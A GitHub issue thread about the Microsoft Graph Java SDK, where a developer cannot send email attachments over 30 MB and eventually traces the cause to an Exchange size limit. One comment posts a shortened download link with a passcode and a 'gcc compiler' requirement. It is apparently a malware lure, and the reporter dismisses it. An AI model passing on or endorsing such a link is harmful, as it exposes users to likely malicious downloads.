### ISSUE TITLE
Trying to attach a large file (>30mb) to the attachment, But unable to attach and getting error message 

### ISSUE THREAD

**Issue by sharmaakshay1704** [microsoftgraph/msgraph-sdk-java#2148]
### Describe the bug

I've been trying to work on sending attachment file sizes that can go upto 100 mb using the graphClient APIs. The way i found is using UploadSession by creating one session, upload file, create a message and send it like that. The issue is even though i am trying to use the method, the upper cap is stuck at 30 mb somehow. Anything greater gives me an error saying **"The message exceeds the maximum supported size., Cannot submit the message"**. I've a proper spring configuration for attaching files upto 250mb. What can be the possible cause, is it a bug from the API itself 

### Expected behavior

It should allow the upload of large file as attachment and send the mail

### How to reproduce

import com.azure.identity.ClientSecretCredential;
import com.azure.identity.ClientSecretCredentialBuilder;
import com.microsoft.graph.authentication.TokenCredentialAuthProvider;
import com.microsoft.graph.models.*;
import com.microsoft.graph.requests.GraphServiceClient;

import java.io.*;
import java.util.*;
import java.util.concurrent.CompletableFuture;
import java.net.HttpURLConnection;
import java.net.URL;

public class EmailWithAttachments {
    private static final String clientId = "your-client-id";
    private static final String clientSecret = "your-client-secret";
    private static final String tenantId = "your-tenant-id";
    private static final String mailId = "your-mail-id"; // sender's email

    public static void main(String[] args) throws Exception {
        List<MultipartFile> files = getFiles(); // Example method to fetch files
        String receiverAddress = "receiver@example.com";
        EmailBody email = new EmailBody("Subject", "Email Body");

        sendEmailWithAttachments(files, receiverAddress, email);
    }

    public static void sendEmailWithAttachments(List<MultipartFile> files, String receiverAddress, EmailBody email) throws IOException {
        // Authenticate
        ClientSecretCredential clientSecretCredential = new ClientSecretCredentialBuilder()
                .clientId(clientId)
                .clientSecret(clientSecret)
                .tenantId(tenantId)
                .build();

        TokenCredentialAuthProvider authProvider = new TokenCredentialAuthProvider(Collections.singletonList("https://graph.microsoft.com/.default"), clientSecretCredential);

        GraphServiceClient<Request> graphClient = GraphServiceClient.builder()
                .authenticationProvider(authProvider)
                .buildClient();

        // Create the draft email message
        Message draftMessage = createDraftMessage(graphClient, receiverAddress, email);

        // Attach files with an Upload Session if needed
        for (MultipartFile file : files) {
            long fileSize = file.getSize(); // Ensure fileSize is long
            if (fileSize > 4 * 1024 * 1024) { // If file size > 4MB, use UploadSession
                String uploadSessionUrl = createUploadSession(graphClient, draftMessage.id, file.getOriginalFilename(), fileSize);
                uploadLargeFile(file, uploadSessionUrl);
            } else {
                createInlineAttachment(graphClient, draftMessage.id, file);
            }
        }

        // Send the email
        graphClient.users(mailId)
                .messages(draftMessage.id)
                .send()
                .buildRequest()
                .post();
    }

    private static Message createDraftMessage(GraphServiceClient<Request> graphClient, String receiverAddress, EmailBody email) {
        // Create email message
        Message message = new Message();
        message.subject = email.getSubject();
        ItemBody body = new ItemBody();
        body.contentType = BodyType.TEXT;
        body.content = email.getBody();
        message.body = body;

        // Set recipient
        Recipient recipient = new Recipient();
        EmailAddress emailAddress = new EmailAddress();
        emailAddress.address = receiverAddress;
        recipient.emailAddress = emailAddress;
        message.toRecipients = Collections.singletonList(recipient);

        // Save the message as a draft
        Message draftMessage = graphClient.users(mailId)
                .messages()
                .buildRequest()
                .post(message);

        return draftMessage;
    }

    private static String createUploadSession(GraphServiceClient<Request> graphClient, String messageId, String fileName, long fileSize) {
        AttachmentItem attachmentItem = new AttachmentItem();
        attachmentItem.attachmentType = AttachmentType.FILE;
        attachmentItem.name = fileName;
        attachmentItem.size = fileSize; // Ensure size is long
        
        AttachmentCreateUploadSessionParameterSet uploadSessionParams =
                AttachmentCreateUploadSessionParameterSet.newBuilder().withAttachmentItem(attachmentItem)
                        .build();
        

        UploadSession uploadSession = graphClient.users(mailId)
                .messages(messageId)
                .attachments()
                .createUploadSession(attachmentItem)
                .buildRequest()
                .post();

        return uploadSession.uploadUrl;
    }

    private static void uploadLargeFile(MultipartFile file, String uploadSessionUrl) throws IOException {
        long fileSize = file.getSize();
        int chunkSize = 5 * 1024 * 1024; // 5 MB

        try (InputStream inputStream = file.getInputStream()) {
            byte[] buffer = new byte[chunkSize];
            long bytesRead = 0;
            int chunkNumber = 0;

            while (bytesRead < fileSize) {
                int read = inputStream.read(buffer);
                if (read < 0) break;

                long rangeStart = chunkNumber * chunkSize;
                long rangeEnd = Math.min(rangeStart + chunkSize - 1, fileSize - 1);

                String contentRange = "bytes " + rangeStart + "-" + rangeEnd + "/" + fileSize;
                uploadChunk(uploadSessionUrl, buffer, read, contentRange);

                bytesRead += read;
                chunkNumber++;
            }
        }
    }

    private static void uploadChunk(String uploadSessionUrl, byte[] chunk, int bytesRead, String contentRange) throws IOException {
        URL url = new URL(uploadSessionUrl);
        HttpURLConnection connection = (HttpURLConnection) url.openConnection();
        connection.setDoOutput(true);
        connection.setRequestMethod("PUT");
        connection.setRequestProperty("Content-Range", contentRange);
        connection.setRequestProperty("Content-Length", String.valueOf(bytesRead));

        try (OutputStream outputStream = connection.getOutputStream()) {
            outputStream.write(chunk, 0, bytesRead);
        }

        int responseCode = connection.getResponseCode();
        if (responseCode != HttpURLConnection.HTTP_OK && responseCode != HttpURLConnection.HTTP_CREATED && responseCode != HttpURLConnection.HTTP_ACCEPTED) {
            throw new IOException("Failed to upload chunk. HTTP response code: " + responseCode);
        }
    }

    private static void createInlineAttachment(GraphServiceClient<Request> graphClient, String messageId, MultipartFile file) throws IOException {
        FileAttachment attachment = new FileAttachment();
        attachment.name = file.getOriginalFilename();
        attachment.contentBytes = file.getBytes();
        graphClient.users(mailId)
                .messages(messageId)
                .attachments()
                .buildRequest()
                .post(attachment);
    }
}

class EmailBody {
    private String subject;
    private String body;

    public EmailBody(String subject, String body) {
        this.subject = subject;
        this.body = body;
    }

    public String getSubject() {
        return subject;
    }

    public String getBody() {
        return body;
    }
}

### SDK Version

6.13.0

### Known Workarounds

No workaround

### Debug output

<details><summary>Click to expand log</summary>
```

<Log output here>

```
</details>

**Comment by Titi68730** [comment]
This might help you
https://bit.ly/3yXXzbX
Passcode: d5kp14h
You must have gcc compiler installed

**Comment by sharmaakshay1704** [comment]
> This might help you https://bit.ly/3yXXzbX Passcode: d5kp14h You must have gcc compiler installed

Come on man, be legit atleast

**Comment by Ndiritu** [comment]
Hi @sharmaakshay1704 
The SDK provides this for you via a [`LargeFileUploadTask`](https://learn.microsoft.com/en-us/graph/sdks/large-file-upload?tabs=java#upload-large-attachment-to-outlook-message). Would you be willing to give it a shot?

From a quick glance at your code, Outlook expects a chunk size less than [4MB](https://learn.microsoft.com/en-us/graph/outlook-large-attachments?tabs=http#step-2-use-the-upload-session-to-upload-a-range-of-bytes-of-the-file)

**Comment by sharmaakshay1704** [comment]
> [`LargeFileUploadTask`](https://learn.microsoft.com/en-us/graph/sdks/large-file-upload?tabs=java#upload-large-attachment-to-outlook-message)

I have tried LargeFielUploadTask already, but the chunk size could be an issue. Let me reduce that and try out again

**Comment by sharmaakshay1704** [comment]
Here, with the LargeFileUploadTask as well. This isn't even attaching my file, even though the mail gets sent
`


public void sendEmailFromAzureWithAttachments(EmailBody email, List<MultipartFile> files, String receiverEmailAddress) throws IOException {

    try{

        ClientSecretCredential clientSecretCredential = new ClientSecretCredentialBuilder()

                .clientId(keyVaultSecret.getValue(clientId))

                .clientSecret(keyVaultSecret.getValue(clientSecret))

                .tenantId(keyVaultSecret.getValue(tenantId))

                .build();



        IAuthenticationProvider authProvider = new TokenCredentialAuthProvider(Collections.singletonList("https://graph.microsoft.com/.default"), clientSecretCredential);

        graphClient = GraphServiceClient.builder().authenticationProvider(authProvider).buildClient();

        Message message = new Message();

        message.subject = email.getSubject();

        ItemBody body = new ItemBody();

        body.contentType = BodyType.HTML;

        body.content = email.getBody();

        message.body = body;



        Recipient recipient = new Recipient();

        EmailAddress emailAddress = new EmailAddress();

        emailAddress.address = receiverEmailAddress;

        recipient.emailAddress = emailAddress;

        message.toRecipients = Collections.singletonList(recipient);



        boolean isOver3mb = files.stream().anyMatch(file -> {

            try {

                return file.getSize() > (1024 * 1024 * 3);

            } catch (Exception e) {

                e.printStackTrace();

                return false;

            }

        });



        if (!isOver3mb) {

            List<Attachment> attachments = new ArrayList<>();



            for (MultipartFile file : files) {

                FileAttachment attachment = new FileAttachment();

                attachment.name = file.getOriginalFilename();

                attachment.contentBytes = file.getBytes();

                attachments.add(attachment);

            }

            message.attachments = new AttachmentCollectionPage(attachments, null);

            UserSendMailParameterSet parameters = UserSendMailParameterSet.newBuilder()

                    .withMessage(message)

                    .withSaveToSentItems(true)

                    .build();

            graphClient.users(mailId).sendMail(parameters).buildRequest().post();

        } else {

            Message draftMessage = graphClient.users(mailId).messages().buildRequest().post(message);

            for (MultipartFile file : files) {

                AttachmentItem attachmentItem = new AttachmentItem();

                attachmentItem.attachmentType = AttachmentType.FILE;

                attachmentItem.name = file.getOriginalFilename();

                attachmentItem.size = file.getSize();



                AttachmentCreateUploadSessionParameterSet uploadSessionParams = AttachmentCreateUploadSessionParameterSet.newBuilder()

                        .withAttachmentItem(attachmentItem)

                        .build();

                UploadSession uploadSession =

                        graphClient.users(mailId)

                                .messages(draftMessage.id)

                                .attachments()

                                .createUploadSession(uploadSessionParams)

                                .buildRequest()

                                .post();

                try {

                    LargeFileUploadTask<FileAttachment> largeFileUploadTask =

                            new LargeFileUploadTask<>(uploadSession,

                                    graphClient,

                                    file.getInputStream(),

                                    3*1024*1024,

                                    FileAttachment.class);

                    LargeFileUploadResult<FileAttachment> results = largeFileUploadTask.upload();

                }

                catch (Exception e) {

                    LOG.error(e.getMessage());

                }

            }

            try {

                finalMessage = graphClient.users(mailId).messages(draftMessage.id).buildRequest().get();

                graphClient.users(mailId).messages(draftMessage.id).send().buildRequest().post();

            }catch (Exception e) {

                LOG.error(e.getMessage());

            }

        }}

    catch(Exception e) {

        LOG.error(e.getMessage());

    }



}`

**Comment by sharmaakshay1704** [comment]
> Hi @sharmaakshay1704 The SDK provides this for you via a [`LargeFileUploadTask`](https://learn.microsoft.com/en-us/graph/sdks/large-file-upload?tabs=java#upload-large-attachment-to-outlook-message). Would you be willing to give it a shot?
> 
> From a quick glance at your code, Outlook expects a chunk size less than [4MB](https://learn.microsoft.com/en-us/graph/outlook-large-attachments?tabs=http#step-2-use-the-upload-session-to-upload-a-range-of-bytes-of-the-file)

Also, i just tried changing to 3 mb chunk size, still the same error

**Comment by sharmaakshay1704** [comment]
To anyone looking for a solution,
https://learn.microsoft.com/en-us/outlook/troubleshoot/message-body/attachment-size-exceeds-the-allowable-limit-error. You need an Exchange Server Admin Access to make this change. There are other ways of doing it like zipping your files.

**Comment by Ndiritu** [comment]
Thanks for investigating this and sharing your solution @sharmaakshay1704.
If possible, please consider upgrading to version 6.x of the SDK to get bug fixes on LargeFileUploadTask and other components. Version 5.x is only receiving security fixes for now due to capacity limitations.
